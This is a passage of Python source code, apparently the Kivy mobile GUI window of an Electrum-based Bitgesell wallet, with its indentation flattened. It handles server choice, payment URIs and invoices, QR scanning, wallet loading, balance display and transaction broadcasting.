notification = app = ref = None
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf',
'electrum/gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum.util import (NoDynamicFeeEstimates, NotEnoughFunds)
if TYPE_CHECKING:
from . import ElectrumGui
from electrum.simple_config import SimpleConfig
from electrum.plugin import Plugins
from electrum.paymentrequest import PaymentRequest
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = PREFERRED_NETWORK_PROTOCOL
def cb2(server_str):
popup.ids.server_str.text = server_str
servers = self.network.get_servers()
server_choices = {}
for _host, d in sorted(servers.items()):
port = d.get(protocol)
if port:
server = ServerAddr(_host, port, protocol=protocol)
server_choices[server.net_addr_str()] = _host
ChoiceDialog(_('Choose a server'), server_choices, popup.ids.server_str.text, cb2).open()
def maybe_switch_to_server(self, server_str: str):
net_params = self.network.get_parameters()
try:
server = ServerAddr.from_str_with_inference(server_str)
if not server: raise Exception("failed to parse")
except Exception as e:
self.show_error(_("Invalid server details: {}").format(repr(e)))
return
net_params = net_params._replace(server=server)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
android_backups = BooleanProperty(False)
def on_android_backups(self, instance, x):
self.electrum_config.set_key('android_backups', self.android_backups, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.db.put('use_change', self.use_change)
self.wallet.save_db()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def set_ln_invoice(self, invoice):
self.switch_to('send')
self.send_screen.set_ln_invoice(invoice)
def on_new_intent(self, intent):
data = intent.getDataString()
if intent.getScheme() == 'bitgesell':
self.set_URI(data)
elif intent.getScheme() == 'lightning':
self.set_ln_invoice(data)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, key, status):
if key not in self.wallet.receive_requests:
return
self.update_tab('receive')
if self.request_popup and self.request_popup.key == key:
self.request_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, key):
req = self.wallet.get_invoice(key)
if req is None:
return
status = req['status']
# todo: update single item
self.update_tab('send')
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.update_status()
def on_payment_succeeded(self, event, key):
self.show_info(_('Payment was sent'))
self._trigger_update_history()
def on_payment_failed(self, event, key, reason):
self.show_info(_('Payment failed') + '\n\n' + reason)
def _get_bu(self):
return self.electrum_config.get_base_unit()
def _set_bu(self, value):
self.electrum_config.set_base_unit(value)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return self.electrum_config.get_decimal_point()
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''The current orientation of the window.
Can be one of `landscape` or `portrait`.
:data:`orientation` is a read only `AliasProperty`. Defaults to 'landscape'.
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Tries to ascertain the kind of device the app is running on.
Can be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty`. Defaults to 'phone'.
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
self.password = None
App.__init__(self)#, **kwargs)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.server.host
self.server_port = str(net_params.server.port)
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._pincode_dialog = None
self._password_dialog = None
self._channels_dialog = None
self._addresses_dialog = None
self.fee_status = self.electrum_config.get_fee_status()
self.invoice_popup = None
self.request_popup = None
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and invoice['status'] == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitgesell import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitgesell:'):
self.set_URI(data)
return
if data.startswith('channel_backup:'):
self.import_channel_backup(data[15:])
return
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
return
# try to decode transaction
from electrum.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'address']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, is_lightning, key):
from .uix.dialogs.request_dialog import RequestDialog
request = self.wallet.get_request(key)
data = request['invoice'] if is_lightning else request['URI']
self.request_popup = RequestDialog('Request', data, key, is_lightning=is_lightning)
self.request_popup.open()
def show_invoice(self, is_lightning, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
data = invoice['invoice'] if is_lightning else key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(title, data, show_text, failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
Window.bind(on_key_down=self.on_key_down)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitgesell: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
util.register_callback(self.on_network_event, interests)
util.register_callback(self.on_fee, ['fee'])
util.register_callback(self.on_fee_histogram, ['fee_histogram'])
util.register_callback(self.on_quotes, ['on_quotes'])
util.register_callback(self.on_history, ['on_history'])
util.register_callback(self.on_channels, ['channels_updated'])
util.register_callback(self.on_channel, ['channel'])
util.register_callback(self.on_invoice_status, ['invoice_status'])
util.register_callback(self.on_request_status, ['request_status'])
util.register_callback(self.on_payment_failed, ['payment_failed'])
util.register_callback(self.on_payment_succeeded, ['payment_succeeded'])
util.register_callback(self.on_channel_db, ['channel_db'])
util.register_callback(self.set_num_peers, ['gossip_peers'])
util.register_callback(self.set_unknown_channels, ['unknown_channels'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def on_channel_db(self, event, num_nodes, num_channels, num_policies):
self.lightning_gossip_num_nodes = num_nodes
self.lightning_gossip_num_channels = num_channels
def set_num_peers(self, event, num_peers):
self.lightning_gossip_num_peers = num_peers
def set_unknown_channels(self, event, unknown):
self.lightning_gossip_num_queries = unknown
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, storage, db):
if storage:
wallet = Wallet(db, storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True),
ask_if_wizard=True)
def _on_decrypted_storage(self, storage: WalletStorage):
assert storage.is_past_initial_decryption()
db = WalletDB(storage.read(), manual_upgrades=False)
if db.requires_upgrade():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.upgrade_storage(storage, db)
else:
self.on_wizard_complete(None, storage, db)
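    # load_wallet_by_name (below) handles three cases: the wallet is already loaded
    # in the daemon (at most a password prompt is needed), the path does not exist
    # yet (the install wizard is launched), or the file exists but is not loaded
    # (user-pw-encrypted storage is decrypted and possibly upgraded first).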
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet.has_password():
def on_success(x):
# save password in memory
self.password = x
self.load_wallet(wallet)
self.password_dialog(
basename = wallet.basename(),
check_password=wallet.check_password,
on_success=on_success,
on_failure=self.stop)
else:
self.load_wallet(wallet)
else:
def launch_wizard():
storage = WalletStorage(path)
if not storage.file_exists():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.run('new')
else:
if storage.is_encrypted():
if not storage.is_encrypted_with_user_pw():
raise Exception("Kivy GUI does not support this type of encrypted wallet files.")
def on_password(pw):
self.password = pw
storage.decrypt(pw)
self._on_decrypted_storage(storage)
self.password_dialog(
basename = storage.basename(),
check_password=storage.check_password,
on_success=on_password,
on_failure=self.stop)
return
self._on_decrypted_storage(storage)
if not ask_if_wizard:
launch_wizard()
else:
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_stop(self):
Logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
#def lightning_open_channel_dialog(self):
# d = LightningOpenChannelDialog(self)
# d.open()
# def lightning_channels_dialog(self):
    # if self._channels_dialog is None:
# self._channels_dialog = LightningChannelsDialog(self)
# self._channels_dialog.open()
def on_channel(self, evt, chan):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def on_channels(self, evt, wallet):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def wallets_dialog(self):
from .uix.dialogs.wallets import WalletDialog
d = WalletDialog()
d.path = os.path.dirname(self.electrum_config.get_wallet_path())
d.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
self.wallets_dialog()
elif name == 'status':
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file('electrum/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
        ''' Initialize the UX part of Electrum. This function performs the basic
        tasks of setting up the UI.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "electrum/gui/icons/bitgesell-mini.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.server.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
self.electrum_config.save_last_wallet(wallet)
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
l = int(self.wallet.lnworker.get_balance()) if self.wallet.lnworker else 0
text = self.format_amount(c + x + u + l)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, 0, self.decimal_point(), is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, x) -> str:
if x is None:
return 'none'
if x == '!':
return 'max'
return format_satoshis_plain(x, self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' sat/byte'
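        # Worked example of the conversion above: a fee rate of 180000 sat/kB
        # divided by 1000 is 180 sat/byte; the exact decimal rendering is up to
        # format_fee_satoshis.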
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum')
except ImportError:
            Logger.error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.wallet.has_password() and now - self.pause_time > 5*60:
self.pincode_dialog(check_password=self.check_pin_code, on_success=None, on_failure=self.stop)
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label):
if not label.data:
return
self.qr_dialog(label.name, label.data, True)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
text = str(text) # so that we also handle e.g. Exception
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def show_transaction(self, txid):
tx = self.wallet.db.get_transaction(txid)
if not tx and self.wallet.lnworker:
tx = self.wallet.lnworker.lnwatcher.db.get_transaction(txid)
if tx:
self.tx_dialog(tx)
else:
self.show_error(f'Transaction not found {txid}')
def lightning_tx_dialog(self, tx):
from .uix.dialogs.lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
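    # broadcast() below hands the actual network call to _broadcast_thread on a
    # background thread and marshals the result back to the UI thread through
    # Clock.schedule_once, so the Kivy event loop is never blocked while sending.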
def broadcast(self, tx):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
self._addresses_dialog.update()
self._addresses_dialog.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
